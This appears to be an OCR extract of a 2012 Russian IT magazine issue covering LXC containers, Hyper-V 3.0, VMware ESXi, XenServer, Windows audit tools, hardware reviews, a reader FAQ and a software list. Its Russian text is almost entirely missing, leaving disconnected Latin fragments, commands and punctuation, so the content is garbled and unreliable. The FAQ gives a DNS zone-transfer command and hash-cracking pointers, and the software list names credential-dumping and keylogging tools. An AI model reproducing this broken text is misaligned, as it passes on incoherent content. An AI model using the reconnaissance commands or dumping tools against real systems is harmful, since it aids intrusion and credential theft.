. Ubuntu :
1. LXC :
# echo RUN=yes >> /etc/default/lxc

2.
/etc/lxc/auto/. ,
:
# ln -sf /var/lib/lxc/node01/config \
/etc/lxc/auto/node01

126

11 /166/ 2012

,
, .
,
/var/lib/lxc/ . :
# cd /var/lib/lxc
# cp -a node01 node02
# vi node02/{config,fstab}

LXC lxc-clone,
, IP. .
LXC
,
. ,
/bin/ls node01,
:
# lxc-execute -n node01 /bin/ls

,
,
.
, lxc-attach:

/tmp /var/lib/lxc/node01/rootfs/tmp none ro, bind 0 0

/tmp ,
( .X11).
2. :
$ xhost +

, , ,
(, -,
).
3. , Xephyr,
.
4. Xephyr :
DISPLAY=:0 Xephyr :2 -screen 1024x768 -dpi 96
DISPLAY=:2 xfce-session

X WINDOW

Xephyr 1024 x 768,

( Xfce). , Xephyr,
(Xephyr
, ,
).

LXC
, , X- Xephyr,
, X-
. :
1. fstab (, /var/lib/
lxc/node01/fstab), :

, LXC. ,
, , ,
. z

# lxc-attach -n node01 /bin/ls

INFO

LXC-

LXC

lxc-attach
lxc-cgroup cgroup-
lxc-checkconfig LXC
lxc-clone
lxc-console
lxc-create
lxc-destroy
lxc-execute

lxc-freeze
lxc-info
lxc-kill kill
lxc-ls ls
lxc-monitor
lxc-netstat
lxc-ps ps
lxc-restart
lxc-setcap Capabilities
lxc-start
lxc-stop
lxc-unfreeze
lxc-version LXC
lxc-wait ( )

Linux-,
LXC ,
. cgroups,

,
SGI cpusets,
Google
. ,
namespaces ( )

, Parallels ( OpenVZ)
IBM. , ,
Linux
, LXC,

, Linux.

11 /166/ 2012

Ubuntu Debian


apt-cacher-ng

,


.

,


: lxc-freeze
-n node01; lxcunfreeze -n node01.

127

SYN/ACK

(grinder@synack.ru)

,

, , , ,
,

. ,

, : , ,

.

. , .

128

11 /166/ 2012

Win2012

HYPER-V 3.0
Windows Server 2012
Hyper-V 3.0,
.
, MS
, , .
, .
:
1 ( 64 ) 64 vCPU
( 4), - 4 320 CPU, Failover
Cluster 64 4000 VM
( 1000). , , .
Linux (Red Hat /
CentOS, SUSE, Ubuntu) FreeBSD.
VHD,
VirtualPC, 2 T,
. Win2012
VHDX, 64 ,

. Windows- 2012 ,
2 , 4
512e.
VHDX Offloaded
Data Transfer (ODX), vStorage API for Array Integration
VMware. , , SAN.
VM virtual SCSI
, IDE .
, ][, Win2012
. ,
Scale-Out File Server VM, ,
.
Hyper-V, ,

.
C , , ? Hyper-V 3.0 Replica,

VM. : SAN,

. C :

11 /166/ 2012

Hyper-V NUMA

, VM
(Delta Replication).
,
( , ). Volume Shadow Copy (VSS),
VM.
Hyper-V Replica : Replication Engine,
, Change Tracking, Network Module,
HTTP/HTTPS-, Management Experience.
VM
HVR Broker role.

,
, VM
. Live
Storage Migration

(Live Migration Without Shared Storage).
,
. ,
VM ( USB-)
shared storage.
, .
, VM,
, .
CPU, .
, VM, .
SR-IOV (Single Root I/O Virtualization)
VM
,
, . SR-IOV
,
VM .
NUMA (Non-Uniform Memory Access) ,
CPU
. VM NUMA, ,
.
, , ,

, , -

129

SYN/ACK

VMware vSphere Client

VMware vSphere

.
, VM ,
.
. PowerShell, .
VM ,
, .
,
Hyper-V Smart Paging,
.

. , 32
(NIC Teaming),
. ,
(Layer 2) Hyper-V Extensible Switch, :
VLAN (Private VLAN),
,
ACL, VLAN Trunking ( VLAN), , ARP Spoofing DHCP Snooping .
PowerShell WMI.
PowerShell :

API, .
Virtual Fibre Channel VM,
LUN MPIO (Multipath I/O).
Win2012
,
Hyper-V Resource
Metering, CPU
RAM, , /
. ,
Enable-VMResourceMetering.
,
ResourceMeteringSaveInterval.

PS> Get-Command -CommandType Cmdlet *VMNetworkAdapter*

PS> Get-Command -CommandType Cmdlet *VMSwitch*

VMWARE ESXI/VSPHERE
VMware (vmware.com)
VMware ESXi,
300 , (baremetal). ,
.
ESXi, .
VMware vSphere, , , . 5.1, .

SCVMM 2012:

Microsoft
System Center. Virtual
Machine Manager 2012
/ , -
-
.
VM, Hyper-V, VMware Citrix XenServer.
VMM2012
(Fabric), VM, .

130

, Distributed
Resource Scheduler VMware,

, VMM VM .
, VMM
, .
VM ,
.
VMM

Hyper-V. -

P2V- V2V-.
VMM 2012
Server Application Virtualization (Server App-V).
VMM Service Template Designer
,
. /
, ( VM). VMM
. Self-Service,
.

11 /166/ 2012

Citrix XenServer 6.0

XenCenter

, VMware
VMware vCloud
Suite, VMware vSphere, vSphere Storage Appliance
VMware Site Recovery Manager.
,
32
ESXi. RAM 32 , ESXi
. .
: , SOHO,
, 32 ,
. CPU. 1 . Free
(vMotion, HA,
DRS, Storage DRS, VM),
vCLI API .
. shell
su, . .
( , Win8/2012) , , 9- Version 9 virtual hardware,
AMD Piledriver Intel Ivy Bridge / Sandy Bridge,
VT-x/EPT (Extended Page Tables) AMD-V/RVI (Rapid
Virtualization Indexing) ,
CPU (RDRAND, RDFSBASE, RDGSBASE, x2APIC ). Improved CPU Virtualization VM CPU,
CPU. vCPU VM
32 64. ,
Windows XP Mode (Virtual Hardware-Assisted Virtualization).
(vGPU)
3D- ,
VMware View,
NVIDIA VGX.
, vCenter 5.1 ESXi,
3. ( Edit Settings Select
compability),
. : stateless caching stateful installs.
ESXi Auto
Deploy,
ESXi PXE,
.

.
SESparse VMDK (Space-Efficient Sparse)

.
4 , ,
.
FCoE (Fibre Channel over
Ethernet).
storage API VAAI
NAS . vSphere ,
VMFS, ,
32, , ,
VDI, NFS.
Hyper-V 3.0, VM
ESXi, SAN, vMotion Storage
vMotion ( VMware vSphere 5.1 vMotion Architecture,
Performance and Best Practices, goo.gl/TIF9C). vSphere
Replication Appliance VM LAN WAN

VM. MSCS (Microsoft Cluster Service)
.
SSD- SMART-.
VM vSphere Data Recovery vSphere
Data Protection (VDP),
EMC Avamar. ,
Changed Block Tracking, (variable-length)
.
vSphere Distributed Switch
(Network Health Check)

11 /166/ 2012

RAM
32 , ESXI
.

131

SYN/ACK

, HEARTBEAT
NFS
VLAN, MTU Teaming, , .
SR-IOV :
MAC- vCenter, (RSPAN ERSPAN),
NetFlow 10, SNMP v3 .
, 5.1 vSphere
Client ,
-, Flash (
Apache Flex).

CITRIX XENSERVER
XenServer (citrix.com) Xen

. : ,
(Live Motion)
, VM
(XenMotion), , High Availability, P2V- .
6.0.2,
2012 , ,
, VDI
. 1 , 16 vCPU 128
vRAM . 6.0.2

Xen 4.1 credit2,

( 255 CPU), GPT (CPU pools
partitioning). Xen 4.1 API (mem_access API), AVX
x86 CPU, PXE- , (HVM). :
dom0, ,
Win8/2012 (goo.gl/khBNu).
,
.
XenServer ISO.
VDI GPU , .
IntelliCache VDI.
Open vSwitch (openvswitch.org),
Active-Backup NIC bonding
, NetFlow, sFlow, RSPAN, ERSPAN, CLI, LACP
802.1ag.
.
Integrated Site Recovery, StorageLink
Gateway Site Recovery,
.
HBA SCSI. , Heartbeat-
NFS-.
vApp (Virtual Appliance) VM. OVF, VM- OVF- XenCenter
VM (vCPU, vRAM, ).

, , -
,
. z
WWW

RED HAT
Red Hat Enterprise Virtualization (redhat.
com/promo/rhev3), ,
Red Hat Enterprise Linux 6 KVM
(Kernel Virtual Machine) Qumranet.
GNU GPL, , oVirt.
2009 ,
2012- . : Live Migration, High availability,
, , VDI .
Red Hat Enterprise Virtualization
Manager, Java-, JBoss. :
,
RESTful API . , VM.
sVirt
SELinux. MS SQL Server PostgreSQL. 160

132

CPU 2 , 64 CPU
512 . (Transparent Huge
Pages): 2 4 , .

Transparent Huge ages
TLB- (Translation
Lookaside Buffer) .
VM x2APIC ,

. , /
Async-IO. SPICE,
, WAN: ,
,
Linux-. VM
( Live Migration). vhost-net
.

SR-IOV:
http://youtu.be/
hRHsk8Nycdg;

VMware
vSphere 5.1:
goo.gl/TIF9C.

INFO

VMware tools 5.1+

11 /166/ 2012

SYN/ACK

(grinder@synack.ru)

WINDOWS-
, , . //
, - , .
, , , , ,
.
.
11 /166/ 2012

133

SYN/ACK

Win2k8R2,

WINDOWS SERVER 2008/2012

Win2k8 .
, 53.
, , .

, .
,
. , Active
Directory ,
:
Directory Service Access ;
Directory Service Changes ;
Directory Service Replication ;
Detailed Directory Service Replication
.

(Global Audit Policy, GAP), (SACL,
System access control list) . (Event
Viewer),
: (, , ), , ,
.
,
. Win2k8 , ,
(, ).
Win2k8R2
, e-mail
. , ,
Win2012 .
, , *-Eventlog *-WinEvent.
:
PS> Get-Help *-Eventlog

, ID 4720 (
):

Win2012

Win2012 . (Dynamic Access Control)

expression-based ,

. ,
, ,
.
(Global Object
Access Auditing).
( 4656,
4663), ,
.
, . ID: (4663) (4656).
,

Active Directory. .
/ / / :
, ,
, , ,
, . (, ).
/
/ / .
Win2012 auditpol. GAP , :

?
:
; ;
;
;
.

PS> Get-EventLog security | ?{$_.eventid -eq 4720}

134

11 /166/ 2012

> auditpol /list /subcategory:*

:
> auditpol /set /subcategory: \
/success:enable /failure:enable

Windows
, ,
, . ,
, -
. .
, ,
, (HIPAA, SOX, PCI ) ,
( ). Windows
128 ,
. , Event Viewer
.
.
( ) . ,
.
: Windows
, .
,
, ,
.

NETWRIX CHANGE REPORTER SUITE

NetWrix (netwrix.ru)
Change Reporter,
: Active Directory, GPO, ,
SQL Server, VMware, SharePoint, .
Change Reporter Suite Enterprise
Management Suite, .
Microsoft System Center Operations Manager,
, AD, GPO Exchange SCOM.
NetWrix SIEM
(Security Information and Event Management) , .
Change Reporter :
. ,
. NetWrix ,
, .

,

. , ,
Audit Configuration
Wizard. , .
,
. : , ,
.
, e-mail,
. : snapshot,
, AD .
10 ,
, .
, , Network Infrastructure Change Reporter
, SNMP,
.
.
Change Rollback Wizard
,
.
, , , , Snapshot Reporting, SCOM.
NetWrix Change Reporter , Windows XP SP3 ,
IIS ( 64- 32- VIDEO

, SQL
Microsoft

Log Parser (goo.gl/b1IlI),
.
, SQL- ,

, , .
, :

11 /166/ 2012

> logparser "SELECT DISTINCT EventID FROM security"

Log Parser Active Directory, IIS Exchange Server.
(W3C, CSV, XML), SQL-,
syslog, .
Log
Parser Studio (goo.gl/vqQdT).

Windows Server
2012 ,


Event
Viewer

PowerShell.

135

SYN/ACK

NetWrix

ADAudit Plus ,

). MS SQL Server
2005, Express Edition. NetWrix
,
.

. . ,
. ,
. . Compliance
, SOX,
HIPAA, PCI-DSS, GLBA FISMA. , (Report
Profile Based Reports) . ADAudit Plus ,
,
/.
ADAudit Plus ,
Windows, XP (32- 64- ).
MS SQL Server 2k5/2k8/2k8R2.
. : Free, Standard Professional (
).
100 .
ADAudit Plus, Zoho
EventLog Analyzer, SIM (Security Information
Management).

ADAUDIT PLUS
Zoho (manageengine.com)
, .
ADAudit Plus, AD, GPO,
, , .
, ,
,
. (
Failover Clusters) , ,
. XLS, HTML, PDF CSV.
e-mail.
,
.
, , e-mail
.
AD GPO .
, :
,
;
/ ,
;
( Exchange, TS,
, ), ,
AD;

.
- ,
. .
, : Home,
Reports, File Audit, Alerts, Configuration, Admin Support.

. Home
, , , /
.
150 ,
Reports,

136

QUEST CHANGEAUDITOR
Quest Software
ChangeAuditor (quest.com/changeauditor),
AD, Exchange,
SQL-, SharePoint, LDAP-,
EMC, NetApp VMware vCenter.
: ,
, ,
/ ,
, ,
. -

,
,
E-MAIL
11 /166/ 2012

AD,
OU GPO. , .

e-mail, WMI SNMP.
:
, ,
.
, .

, .

, . ,
.
, ChangeAuditor
.

,
SAS 70, HIPAA, GLBA, ISO 17799, FISMA.
,
, .
.
, Quest InTrust
Windows .

,
.
, ChangeAuditor Coordinator.

, ,
. MS Systems Center
Operation Manager Quest Software. , Quest InTrust SIM ,
Windows *nix,
.
,
x86/x64 Windows XP SP2, Coordinator
Windows Server 2003 SQL Server 2k5 SP2.

data)
, AD .
,
, ,
,
, -
. , ,
.

.
, ,
, (,
, , ).

.
(CSV, Excel )
. .
,
Windows.
Varonis DatAdvantage 200 500 . Varonis
DatAdvantage, Windows, AD, SharePoint,
Exchange *nix.

Windows, , ,
. ,
. z
INFO
Win2k8:



,

.

WARNING

Windows
128 ,



.
,

Event Viewer


.

.

VARONIS DATADVANTAGE FOR WINDOWS

, ,
. ,
,
, ,
. Varonis DatAdvantage
(varonis.com) . (unstructured

11 /166/ 2012

WWW
EventID:
kb.monitorware.com/
kbeventdb.html.

NetWrix Change Reporter

137

FERRUM

ASUS O!PLAY
MEDIA PRO

UPGRADE

ru.asus.com

O!Play ASUS ,
Media Pro ,
, set-top box, ,

Smart TV.
SUS O!Play Media Pro
RTD1185DD. ,
, , ,
.
,
,
. -,
, ASUS
O!Play Media Pro Wi-Fi
802.11n, -,
DVB-T.
:
SD/MMC USB-, USB
, AV-.
HDMI
mini-HDMI,
,
.
ASUS O!Play Media Pro
,
Realtek , .
DVB-T,

,
, .
, -,

, YouTube,
Dailymotion, Picasa, Flickr, Yahoo, - -,

138

Muzee. - AceTrax Facebook

.
SmartTV
,
YouTube Facebook
Facebook
YouTube? ASUS O!Play
Media Pro ! ,
.
.


loseless- APE,
-
CUE.
Dolby TrueHD,
MKV.
, ISO,
,
.

RightTxT, .
Apple TV!

USB- 60 /,
HD- -

. , ASUS O!Play Media Pro

Full HD ,
50 60 . , ,
-, .
HD Wi-Fi-
,
25 /.
,
,
O!Play.

!. ,
O!Direct, ,
ASUS O!Play Media Pro ,
. , Android,
O!MediaShare, , O!Direct,
.
ASUS O!Play Media Pro
,

. z

11 /166 / 2012

FERRUM

OCZ VERTEX 4
25SAT3-256G

VERTEX

: Intel Core i7-3960X Extreme Edition,
3300 @ 3600
: ASUS P9X79 PRO
: Corsair CMGTX7, 1 x 4 ,
DDR3 1333
: Chaintech GE240GT-A1024N1
: CSSD-F120GB2 120
: Corsair CMPSU-1000HX, 1000
: Windows 7
, 64

-: 2,5
: SATA 3.0
: MLC, ONFi 2.2, 25
: Indilinx Everest 2
: 560 /
: 510 /
: 2
: 256

6700
.

+
-

SSD .

,
,

.
, SSD
Vertex ( ,
) .
,
OCZ Vertex
Indilinx
. OCZ Vertex 2
OCZ Vertex 3
LSI SandForce. Indilinx,
OCZ Technology
. ,
,
LSI SandForce

11 /166/ 2012

SSD



PCMark Vantage OCZ
VTX3-25SAT3-240G

Indilinx ,
- .
OCZ VTX4-25SAT3-256G,
, OCZ Vertex 4, Indilinx Everest 2.
(MLC) SSD 25- .
: 64, 128, 256 512 .
- LSI SandForce?
-, SSD
OCZ
Technology, .
-, Indilinx Everest 2

(, JPG, MP3 ),
SandForce SF-XXXX.
Anvils Storage
Utilities 1.0.27.
,
OCZ VTX4-25SAT3-

IOMETER
Random read 4 : 24,2 /
Random write 4 : 80,91 /
Seq. read 128 : 360,99 /
Seq. write 128 : 411,98 /
Iometer patterns:
Database: 41,52 /
Fileserver: 52,95 /
Workstation: 36,5 /
Webserver: 74,47 /
PCMARK VANTAGE (HDD)
Test Suite: 35 923
Windows Defender: 171,91 /
Gaming: 152,72 /
Importing pictures to Windows Photo
Gallery: 150,16 /
Windows Vista startup: 218,83 /
Video editing using Windows Movie
Maker: 175,31 /
Windows Media Center: 218,5 /
Adding music to Windows Media Player:
121,07 /
Application loading: 153,8 /
ANVILS STIRAGE UTILITIES 1.0.27
Seq. read/write (
): 487,974/412,09 /
Seq. read/write ( ):
488,08/410,26 /

256G . ,
,
.

Indilinx
LSI SandForce, OCZ Technology
4- Vertex
.
,
,
. , ,
,

Vertex. OCZ Technology
,

. , ,
, NAND OCZ VTX4-25SAT3-256G
. z

139

FAQ

(cherboff@gmail.com)

FAQ

FAQ@REAL.XAKEP.RU

, JTAG,

?

,

, , .


JTAG- ( ,
).
,
,
,
,
.

: TDI/TDO /
, TMS TCK
. ,
,
,

(
). ,
-,
.

, BGA- (

, ),

- .
,
JTAG-finder',


.


Arduino JTAGenum (bit.ly/jtagenum)

.

USB- Linux?

Linux

sysfs. USB
,

.
/sys/bus/usb/
devices/, ,
, .

/sys/bus/usb/devices/[id ]/[id

]/power/level.

auto.

suspend. ,
, .
:
sudo echo suspend > /sys/bus/usb/ \
devices/[id ]/[id ]/
power/level

, , .
- ,
auto on.

-
?

,

, , .
,
name-. ,
.

?
,
,
.

. .

140

!

,
.
, CTF-,
,
.
.

11 /166/ 2012

,
, AXFR-
:
$ dig @ns-server mysterydomain.net axfr

,
, ,
DNS-
nmap ( , ).

-:
* inurl:mysterydomain.net

,
serversniff (bit.ly/serversniff).
Q . ,
- ,
?
, -
,
,
-.
, ,


,
InsidePro (insidepro.
com/hashes.php). ,


( ):
, .
,
, , md5(sha1(md5($pass)).
sha1($pass)). ,
hash-identifier
(bit.ly/hashid),

,

JTAG.
, ,
.

embedded-
(ARM),
.

JTAG (Joint
Test Action Group).
,
,
,
,

. ,
JTAG
,
.
,
, -
,
,
,
-. GOD-mode
, , ,
,

(
).
. ,
JTAG ,

JTAG

,
JTAG- ,
.
, ,
. ,

,

.
, , , Wiggler (
, , LPT-
).

IDE (Keil, IAR),

(Open OCD).

DEFCON-:
DEFCON #7812 (defcon-russia.ru)
DefCon-UA (defcon.org.ua). -,
, ,
- , .

, Black Hat DEF CON,

.
Zeronights (zeronights.ru) Positive Hack Days
(phdays.ru),
.

, , ,

. , ,
. ,
, , .

11 /166/ 2012

141

FAQ
.

Android 2.x?

, ,
.
Google Play Market,

. ,

Android 3.2,

. ,
, ,
, ,
, root-,
.
Android Debug Bridge,
, Android SDK (bit.ly/droidsdk).
USB ( ).
USB-
,

Android SDK (android-sdk\extras\google\usb_
driver\).
Dalvik Debug Monitor (\android-sdk\
tools\ddms.bat) Device
Screen Capture.
!

,
VirtualBox, ?

VirtualBox, ,
, ,
VSphere,
VMware . , VirtualBox API
.

phpVirtualBox (bit.ly/phpvb) ,
GUI- ,
,
.

- PHP
5.1.0.
AJAX ,
,
. ,

,
.

Q
142

Tor
?

phpVirtualBox - VirtualBox

-
Tor, ,
,
,

.

,
VPN.
Tor'
: !
! ;).
, , .
, Skype
.

SkypeMorph (bit.ly/
skypemorph).
Skype
ID (5 ) SkypeKit ,
Skype.

( ) .

,
.

torrc
.
, . ,

,

:).

bash'

. ,
Python,

. ,
- ?

Python sh (amoffat.github.com/sh/index.html).

:
,
.
,
:
from sh import ifconfig
print(ifconfig("wlan0"))

:
print(ls("-l"))

. , :
adduser("amoffat", "--system", . \
"--shell", "/bin/bash",
"--no-create-home")

cron Windows?
,
A ,


, nnCron (nncron.ru). :

;

;
,
,
, ;
////
/
,
;
-
, ;
;

;

. z

11 /166/ 2012

>Multimedia
Actual Multiple Monitors 4.2
Daum PotPlayer 1.5
Flutter 0.1.185
iSpy 4.5.4
MartView 2.5.2
MP3Gain 1.2.5
PhotoPad Image Editor
QMP3Gain 0.9.0
Shark007 3.8.0
Splash Lite 1.8.0
TVersity 2.3
VideoMach 5.9.7
VLC 2.0.3
Volume2 1.1.3

>Misc
AltMove 2.1.7
Compare Advance 1.4.0
Explzh 7.06
FileOptimizer 2.10
FlashTray Pro 4.0
Handy File Tool 2.00
HaoZip 3.0
Lanchbar 4.0
Limagito FileMover Lite
9.109.19.1
Lost Photos 1.0
NoteTab Light
PasteAsFile 2.1.4.0
Phrozen Safe USB 1.0
Split Byte
StartMenu 8
USB Fix It

>Development
Checkheaders 1.0.1
CommitMonitor 1.8.3
CrashRpt 1.3.1
CruiseControl 2.8.4
glog 0.3.2
Google Test 1.6.0
MetalScroll 1.0.11
QDevelop 0.28
Rapidjson 0.1
RockScroll 1.0
SQL Watch 4.0
Sublime Text 2.0.1
Symfony 2.0
TortoiseGit 1.7.13
TortoiseHg 2.5.1
Twitlib 2.0

>>WINDOWS
>DailySoft
foobar2000 1.1.15
Google Chrome 22
0
Miranda IM 0.10.4
Notepad++ 6.1.8
Opera 12.02
PuTTY 0.62
Skype 5.8
Sysinternals Suite
Total Commander 8.01
Unlocker 1.9.1
uTorrent 3.2
XnView 1.99.1

>>UNIX
>Desktop
Ardour 2.8.14
Artofillusion 2.9.1
Audacious 3.3.2
Avidemux 2.6.0
Ballroomdj 1.3
Cinnamon 1.6

>System
AbpMon 9.0
EaseUS CleanGenius 3.0.5
Fresh Diagnose 8.66
GreenCloud Printer 7.5.3
GridMove 1.19.60
Moborobo 2.0.6
ProcessAlive 0.5
Puran Utilities 1.0
PZen Dump 1.0
SharpKeys 2.1.1
Siren 3.01
SmartCopyTool
USB Disks Access Manager 1.0
WinOwnership 1.1
Wise Program Uninstaller 1.03
Beta
YAPM 2.4.1

>Security
Adobe SWF Investigator 0.6.3
EncryptOnClick 1.4.1.2
Fireshark 2.0.1
Heaper
IronWASP 0.9.1.5
jsql-injection 0.1
MemGator 2.1.2
NEWT 2.5
Peach 2.3.8
PrivaZer 1.2.24
Process Hacker 2.28
R-Crypto 1.5
Rohos Logon Key 2.9
rp++
Spyrix Free Keylogger 2.0
Termineter 0.1.0
Web shell detector 1.64
WebCruiser 2.6.1

>Net
ADSL Speed Test
Blinq 1.13
CarotDAV 1.9.7
DNSBench
Feedreader 3.14
Important Mail Alert
Mikogo 4.6
MKTwitter
Morphine
Network Sorcerer 1.3
ProxySwap
RSS Bandit 1.9.0
ShareMouse 1.0.91
UltraVNC 1.0.9.6.2
Voxeet
WifiInfoView 1.05

VSDC Free Video 2.4.2.260

Yankee Clipper 1.0.4.3

>Security
Android Security Evaluation
Framework
Clamav 0.97.6
Dnscrypt 1.1.0
EAPeak 0.1.5
Entropybroker 1.2
Faar 0.3.0
Fireshark 2.0.1
GDBFromVim
Gnutls 3.1.2
jsql-injection 0.1

>Net
4kdownload 2.4
Centerim 5.0.0b1
Choqok 1.3
Chrome 22.0.1229.79
Ekiga 3.2.7
Ktorrent 4.3.0
Lanmsngr 1.2.35
Licq 1.6.1
Mailnotify 5.4
Opera 12.02
Ostinato 0.5.1
Privoxy 3.0.19
Quassel 0.8.0
Rssowl 2.1.4
Thunderbird 15.0.1
Tvbrowser 3.2
Vuurmuur 0.8b4
Vuze 4.7.20

>Games
Megaglest 3.6.0.3

>Devel
Aptana 3.2.2
Bluefish 2.2.3
Buildbot 0.8.7
Codelite 4.1.5770
Dojo 1.8.0
Efl 1.7
Erlang r15b02
Hybridcache 0.8.5
Jsoup 1.7.1
Juce 2.0
Numpy 1.6.2
Paranoid 0.36
Percona-toolkit 2.1.3
Poco 1.4.4
Rhino 1.7r4
Sesame 2.6.9
Staff 2.0.0a1
Wxhexeditor 0.20

Conky_box
Dia 0.97.2
Digikam 2.9.0
Din 4.1
Exaile 3.3.0
Freefilesync 5.7
Gstreamer 1.0
Handbrake 0.9.8
Luminancehdr 2.3.0
Luxrender 1.0
Mupdf 1.1
Opengostfont 0.3

>>MAC
Anxiety 1.0
Bark 1.1
DiskWave 0.4.0
Eve 1.2.0
Fink 0.9.0
GrandPerspective 1.5.1
iChm 1.4.2
keychaindump
Kigo Video Converter 1.1.0
MacDjView 0.1.2
Mountain Tweaks 1.0.3
NeoOffice 3.2.1
Remote Desktop Connection
Client 2.1
RetinaCapture
Seashore 0.5.1
Sticky Notifications 1.0.4

>X-distr
CentOS 6.3

>System
Dsscheduler 0.5
Grep 2.14
Linux 3.5.4
Mksh r40f
Mosshe 12.8.20
Patch 2.7
Pydsh 0.7
Raider 0.13.2
Reiser4 3.5
Systemd 190
Virtualbox 4.2.0
Xen 4.2.0
Xorg 1.13.0
Xplorer 0.10.0

>Server
Apache 2.4.3
Asterisk 10.8.0
Cassandra 1.1.5
CouchDB 1.2
CUPS 1.6.1
HAproxy 1.4.22
Lighttpd 1.4.31
Lucene 3.6.1
Memcached 1.4.15
MongoDB 2.2
nginx 1.2.4
OpenSSH 6.1
OpenVPN 2.2.2
Redis 2.4.17
Samba 3.6.8
Sphinx 2.0.5
Squid 3.2.1

keyring-dump
Lpvs 0.1
Peach 2.3.8
Radamsa 0.3
Rkhunter 1.4.0
rp++
Skipfish 2.09b
Termineter 0.1.0
Tor-browser 2.2.39-1
Unhide
Web shell detector 1.64

11 (166) 2012

UNITS / WWW2

WWW2
JETSTRAP
jetstrap.com

, Bootstrap

Bootstrap -.
: Twitter ,
Bootstrap, .
- .
, Jetstrap
, Bootstrap .
, , ; ,
.

ASCII.IO
ascii.io

YouTube ,

ASCII.IO UNIX-,
. Python,
.
. : , ,
ASCII-. , .
(, ),
.

JUMPSHARE
jumpshare.com

,
150

Jumpshare . -,
? , Jumpshare 150 ( )
, , .
2 , . ,
,
.
, , .

SHORTCUTFOO
https://www.shortcutfoo.com

144

shortcutFoo ( Vim Emacs), IDE (Eclipse, Visual Studio, XCode) .

.
, .

. ,
.
, .

11 /166/ 2012